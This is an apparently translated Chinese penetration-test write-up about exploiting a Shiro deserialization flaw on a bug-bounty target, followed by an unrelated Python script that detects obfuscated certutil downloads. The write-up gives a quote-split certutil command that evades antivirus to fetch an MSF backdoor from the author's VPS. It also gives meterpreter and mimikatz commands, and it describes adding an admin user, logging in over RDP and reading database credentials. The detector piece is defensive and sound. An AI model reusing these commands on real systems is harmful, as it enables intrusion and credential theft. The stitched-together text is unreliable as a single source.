
Title: Record Shiro deserialization to remote desktop


First, I searched Qi'anxin Hunter for the SRC's assets (I will leave out the details), then searched subdomains on ThreatBook (Weibu) and found today's test site.


Then, using xray, I detected that the site has a Shiro deserialization vulnerability.


So I considered using feihong's deserialization tool directly, but this time it only detected the key and not the gadget. After consulting my colleague Chen Ge, I figured it was because the tool had not been updated in a long time, so I needed to find a CB (CommonsBeanutils) chain; one press of Enter and the shell bounced right back.

Got straight to work and checked whether the system had antivirus software. It was clear at a glance that Huorong antivirus was installed.

After confirming that the target system had Huorong, I tried to bring the shell online immediately. Related article: Remember the practical case of bypassing Huorong's security and privilege escalation.

But unfortunately, after trying this method many times locally, I found that Huorong intercepts and detects it.

In later communication with the 3h master, it seemed that the detection was on file characteristics, but there was no way to explore a bypass more deeply.

Off topic: there is a small pitfall when testing here. It seems to be a problem with the tool: it hangs when executing commands with a large amount of echoed output, and you need to restart the tool and run the command again.

Here I chose the certutil remote download method to bypass Huorong. A plain certutil download is definitely blocked, so I thought of the modified certutil bypass that a master had posted in the group earlier. Local testing showed that Huorong did not intercept the command. By this point my excited little hands were already itching.

'c''e''r''t''u''t''i'l' -'u''r''l' -'u''r''l''c''a''c''h''e' -split -f https://url/1.exe 1.exe

Off topic: I found that the target system did not resolve my VPS's IP, which had me asking around everywhere for a VPS in the small hours. I felt I should keep both a domestic VPS and a foreign VPS ready at all times.

After finding a VPS, I pinged its IP address from the tool.


It resolved to the IP, good. Before downloading, though, it is better to check the target server's recent login times to avoid being discovered.

Getting started: first start a temporary Python web server on the VPS; the command is as follows.

python -m SimpleHTTPServer 8888

Then test locally to see whether the file can be downloaded. OK, no problem!

Now execute it directly on the target system from the tool; the file landed successfully in the current path.

Run the dir command to confirm that it was downloaded to the current directory.

Run the file and the shell comes online.

View the system version.

Because it is a newer version, plaintext credentials cannot be obtained.


So there are two ways to connect remotely: upload remote-control software, or directly add a user.

Let's look at the first one: use the screenshot command to see whether the machine is on the lock screen.

From this we can judge that the machine is currently on the lock screen, so the only option here is to add a user. Because Huorong is on the machine, adding the user also requires bypassing Huorong. I will not release that method for the time being (please forgive me, masters).

After the user is added, I can connect to remote desktop.

Now you can connect

After getting in, I rummaged around and found a configuration file with the database information.

MySQL connection


Summary

1. Through xray passive scanning, the target system was found to have a Shiro deserialization vulnerability.

2. First used feihong's deserialization tool, but this time it only detected the key, not the gadget.

3. The target system's shell was successfully bounced out with shiro_attack-4.5-SNAPSHOT-all (using the CommonsBeanutils chain here).

4. First executed tasklist /svc and, with the help of the Windows privilege-escalation auxiliary tools (https://github.com/Ruiruigo/WinEXP or https://i.hacking8.com/tiquan), identified the usysdiag.exe process as Huorong.

5. Bypassed Huorong with the modified certutil to download files, so the backdoor file can be downloaded to the target system:

'c''e''r''t''u''t''i''l' -'u''r''l''c''a''c''h''e' -split -f https://url/1.exe 1.exe

6. Generated the reverse-shell backdoor 123.exe with MSF on the VPS (the 123.exe generated here needs to evade AV).

7. Built an HTTP service on the VPS and placed 123.exe under the running SimpleHTTPServer service:

python -m SimpleHTTPServer 8888

8. Downloaded the backdoor through the command execution function of shiro_attack-4.5-SNAPSHOT-all and executed 123.exe:

'c''e''r''t''u''t''i'l' -'u''r''l''c''a''c''h''e' -split -f https://url/123.exe 123.exe

9. After running the file, the shell came online. Checked the system version and patches and ran mimikatz for plaintext; because it is a newer version, plaintext credentials could not be obtained:

meterpreter > getuid // show administrator privileges
meterpreter > systeminfo // show system patches
meterpreter > load_kiwi // load mimikatz
meterpreter > getsystem // escalate
meterpreter > creds_wdigest // get hash values
meterpreter > shell
netstat -ano -p tcp | find "3389" // show that port 3389 is open

10. Bypassed Huorong and added the user to the administrators group.

11. Logged in to remote desktop via mstsc and found the username and password in the database configuration file of the target website on the system.

Here you can also upload a Glass one-liner webshell and then connect to the database through Glass's own database management module.

Original link: https://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==mid=2247494220idx=1sn=5009f9378aed90335f0bfe5e97f12a84chksm=cfa54e5ff8d2c74969789d47eff9b9755fbd08b4d80e7a4dbc7f35534852c317bfd5d6fae0cdscene=178cur_album_id=1553386251775492098#rd
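The quote-split certutil command in the write-up above defeats a naive substring match on "certutil", which is why a download that Huorong otherwise blocks slipped through. As an added defender-side example (not part of the original post or any tool it mentions), the Python below normalizes process-creation command lines the way cmd.exe effectively does (quotes and carets removed) before checking for certutil's download switches plus a URL, and rates the finding higher when the program name only becomes visible after normalization. The sample command lines are constructed here; the hosts, URLs and file names in them are placeholders, not values from the target.

```python
import re

# Constructed sample process-creation command lines (placeholders, not from
# the post's target). Entries 2 and 4 mirror the quote-split and caret-split
# certutil invocation style; 1, 5 and 6 are benign for contrast.
SAMPLE_COMMANDLINES = [
    "certutil -hashfile C:\\Windows\\explorer.exe SHA256",
    "'c''e''r''t''u''t''i''l' -'u''r''l''c''a''c''h''e' -split -f https://url/1.exe 1.exe",
    "certutil.exe -urlcache -split -f http://192.0.2.10:8888/123.exe 123.exe",
    'cmd.exe /c "cer^tutil -url^cache -split -f http://192.0.2.10:8888/123.exe 123.exe"',
    "certutil -encode secret.txt secret.b64",
    "python -m SimpleHTTPServer 8888",
]

# By the time cmd.exe hands the arguments to the program, the quotes are gone
# and ^ has escaped the character after it, so 'c''e''r''t''u''t''i''l'
# and cer^tutil both run as certutil. Normalize the same way before matching.
QUOTE_OR_CARET = re.compile(r"[\"'^]")
DOWNLOAD_SWITCHES = ("-urlcache", "/urlcache", "-verifyctl", "/verifyctl")
URL = re.compile(r"\b(?:https?|ftp)://\S+")


def normalize_cmdline(cmdline: str) -> str:
    """Return the command line as it is effectively executed: quotes and
    carets removed, lower-cased, whitespace collapsed."""
    return " ".join(QUOTE_OR_CARET.sub("", cmdline).lower().split())


def classify(cmdline: str) -> dict:
    """Classify one command line; severity is 'none', 'medium' or 'high'."""
    norm = normalize_cmdline(cmdline)
    uses_certutil = "certutil" in norm
    # The program name only appears after normalization: the string was
    # deliberately split to defeat a plain substring match.
    obfuscated = uses_certutil and "certutil" not in cmdline.lower()
    # certutil fetching a remote URL with its cache/verify switches is the
    # download primitive; hashing or encoding a local file is not.
    download = (uses_certutil
                and any(sw in norm for sw in DOWNLOAD_SWITCHES)
                and URL.search(norm) is not None)
    if download and obfuscated:
        severity = "high"
    elif download:
        severity = "medium"
    else:
        severity = "none"
    return {"cmdline": cmdline, "normalized": norm, "obfuscated": obfuscated,
            "download": download, "severity": severity}


def scan(cmdlines) -> list:
    """Return the findings (severity other than 'none') for a batch of lines."""
    return [f for f in (classify(c) for c in cmdlines) if f["severity"] != "none"]


if __name__ == "__main__":
    for finding in scan(SAMPLE_COMMANDLINES):
        print(f"[{finding['severity']:6}] obfuscated={finding['obfuscated']!s:5} "
              f"{finding['normalized']}")
```

Keep both the raw and the normalized command line in the alert: the normalization is lossy (legitimate quoted paths lose their quotes too), so it is a matching aid, not a faithful reconstruction. The same pre-normalization step applies to any LOLBin rule, since the quote and caret tricks are not specific to certutil.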
